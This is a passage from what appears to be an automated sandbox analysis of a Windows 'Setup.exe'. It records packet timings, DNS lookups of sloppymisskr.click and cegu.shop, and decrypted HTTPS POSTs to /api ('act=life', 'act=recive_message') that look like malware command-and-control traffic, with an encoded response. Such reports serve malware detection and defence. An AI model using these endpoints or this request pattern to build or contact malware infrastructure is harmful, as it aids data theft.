                                                                                                                                                    Jan 5, 2025 17:54:16.894575119 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894582033 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.894594908 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894628048 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894639969 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.894645929 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894669056 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894675970 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.894680977 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.894720078 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.894725084 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.895250082 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.895275116 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.895288944 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.895294905 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.895332098 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.898818970 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.951343060 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.982686043 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.982743025 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.982767105 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.982774973 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.982784986 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:16.982822895 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:16.982829094 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.016793013 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.016884089 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.096090078 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.096090078 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.096117020 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.096127033 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.701242924 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.701318979 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.701392889 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.701703072 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.701719046 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.182533026 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.182604074 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.184511900 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.184526920 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.184782982 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.186382055 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.186558962 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.186597109 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.186652899 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.186660051 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.882344961 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.882457018 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.882555008 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.883014917 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.883038998 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.160696983 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.160742998 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.160907984 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.161237001 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.161254883 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.620666027 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.620754957 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.622874975 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.622885942 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.623117924 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.624711037 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.624886036 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.624913931 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.186530113 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.186631918 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.186822891 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.235737085 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.235758066 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.770231009 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.770270109 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.770334005 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.770787954 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.770800114 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.248292923 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.248372078 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.249804020 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.249815941 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.250050068 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.251503944 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.251641035 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.251677990 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.251748085 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.251756907 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.875569105 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.875675917 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.876522064 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.876728058 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.876754999 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:23.707118988 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:23.707173109 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:23.707235098 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:23.707560062 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:23.707571030 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.192543030 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.192636013 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.194039106 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.194051981 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.194283962 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.195483923 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.195632935 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.195660114 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.648323059 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.648406029 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.648452044 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.648727894 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.648740053 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.732935905 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.732980967 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.733042955 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.733374119 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.733391047 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.189068079 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.189162016 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.190638065 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.190654039 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.190931082 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.192174911 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.192260027 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.192265034 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.688070059 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.688174009 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.688239098 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.691570044 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.691587925 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:26.719917059 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:26.720019102 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:26.720104933 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:26.720499992 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:26.720539093 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.191672087 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.191854000 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.193232059 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.193253040 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.193497896 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.194920063 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.195748091 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.195800066 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.195904970 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.195950031 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196369886 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196424961 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196559906 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196602106 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196758032 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196798086 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196954012 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196985960 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.197005987 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197022915 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.197161913 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197190046 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.197218895 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197429895 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197460890 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.205996037 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.206155062 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.206204891 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.206242085 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.206319094 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.210958958 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:28.804460049 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:28.804564953 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:28.804651976 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:28.928518057 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:28.928595066 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:29.092134953 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.092201948 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:29.092272997 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.093063116 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.093077898 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:29.570868969 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:29.571027994 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.572602987 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.572617054 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:29.572863102 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:29.574232101 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.574254036 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:29.574316025 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.024044037 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.024142981 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.024198055 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:30.024466038 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:30.024466038 CET49757443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:30.024487972 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.024498940 CET44349757104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.140398979 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:30.140435934 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.140516043 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:30.140923023 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:30.140933990 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.792156935 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.792272091 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:30.794043064 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:30.794054985 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.794297934 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.795665979 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:30.839324951 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:31.062042952 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:31.062102079 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:31.062151909 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:31.062474012 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:31.062494040 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:31.062504053 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                    Jan 5, 2025 17:54:31.062509060 CET44349758185.161.251.21192.168.2.4

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 5, 2025 17:54:14.876308918 CET5489653192.168.2.41.1.1.1
                                                                                                                                                    Jan 5, 2025 17:54:14.888458967 CET53548961.1.1.1192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:30.027750015 CET5494853192.168.2.41.1.1.1
                                                                                                                                                    Jan 5, 2025 17:54:30.139241934 CET53549481.1.1.1192.168.2.4

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Jan 5, 2025 17:54:14.876308918 CET192.168.2.41.1.1.10xc49eStandard query (0)sloppymisskr.clickA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 5, 2025 17:54:30.027750015 CET192.168.2.41.1.1.10x967aStandard query (0)cegu.shopA (IP address)IN (0x0001)false

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Jan 5, 2025 17:54:14.888458967 CET1.1.1.1192.168.2.40xc49eNo error (0)sloppymisskr.click104.21.90.109A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 5, 2025 17:54:14.888458967 CET1.1.1.1192.168.2.40xc49eNo error (0)sloppymisskr.click172.67.199.223A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 5, 2025 17:54:30.139241934 CET1.1.1.1192.168.2.40x967aNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • sloppymisskr.click
                                                                                                                                                    • cegu.shop

                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.449748104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:15 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 8
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                    2025-01-05 16:54:15 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:15 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=k86vjn7fl9j2lgnkaknp2ngu28; expires=Thu, 01 May 2025 10:40:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yrciEEi4C1QB%2FnHRkH6%2BxLbgSsoEhAvxu%2FUJy8tMblmJ%2FBAphUtvc7nv5WH%2F0HnHCRaxj5jCGdF30WP9DVZJ6%2Bya3%2BrawQKFbjTxA%2BHbbeUH3sKhOsD5BroANB6hZtXeUizthLk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd3b1dbc424d-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2001&rtt_var=793&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1343764&cwnd=208&unsent_bytes=0&cid=b9cd748ffaae8c68&ts=522&x=0"
                                                                                                                                                    2025-01-05 16:54:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    2025-01-05 16:54:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.449749104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:16 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 78
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:16 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
                                                                                                                                                    2025-01-05 16:54:16 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:16 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=ohk87q5en89qk952meguko8p39; expires=Thu, 01 May 2025 10:40:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjua7bP2kQxFBxr58QubEpAB%2BUkLvsXjozGWbajv87sauAeNShxv89lRdkECI8hp8AfHzQScNPvX8Kgg0WwuS%2Bgt65HEAhUmLPMoWmhDqIay4eIeC6ew5A7J3vVOnPeESnkXVW0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd411ad35e73-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1625&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=980&delivery_rate=1796923&cwnd=201&unsent_bytes=0&cid=bdf0d06eacc1fc99&ts=494&x=0"
                                                                                                                                                    2025-01-05 16:54:16 UTC244INData Raw: 31 63 61 63 0d 0a 6a 48 52 69 5a 45 6c 49 6e 49 6a 66 51 6a 37 4f 70 43 79 34 54 70 72 39 37 6a 43 63 4c 6d 57 41 47 2f 65 45 66 55 67 78 6d 41 6a 33 56 68 52 47 63 33 79 77 71 71 77 6e 48 50 54 51 58 73 30 72 74 74 2b 50 56 4c 34 55 41 2b 46 33 68 4f 46 52 61 6b 66 31 4b 72 59 53 41 77 67 36 4c 62 43 71 75 6a 6f 63 39 50 39 58 6d 69 76 30 33 39 51 53 2b 55 51 48 34 58 65 56 35 52 59 6e 51 66 52 72 35 42 67 46 44 43 77 72 2b 4f 6d 7a 4c 31 75 72 77 55 33 53 49 50 4f 51 68 6c 32 2b 41 6b 66 6c 59 64 57 2b 58 77 56 55 37 47 6e 42 46 52 45 50 61 7a 57 77 38 2f 30 6e 55 4f 79 65 44 74 6b 72 2b 4a 47 49 56 50 64 47 44 65 68 2f 6c 4f 41 58 4f 46 6a 2b 59 4f 51 57 42 67 30 6d 49 75 7a 6b 75 53 68 51 72 63 74 4e 6d 6d 4b 34 6d 4a
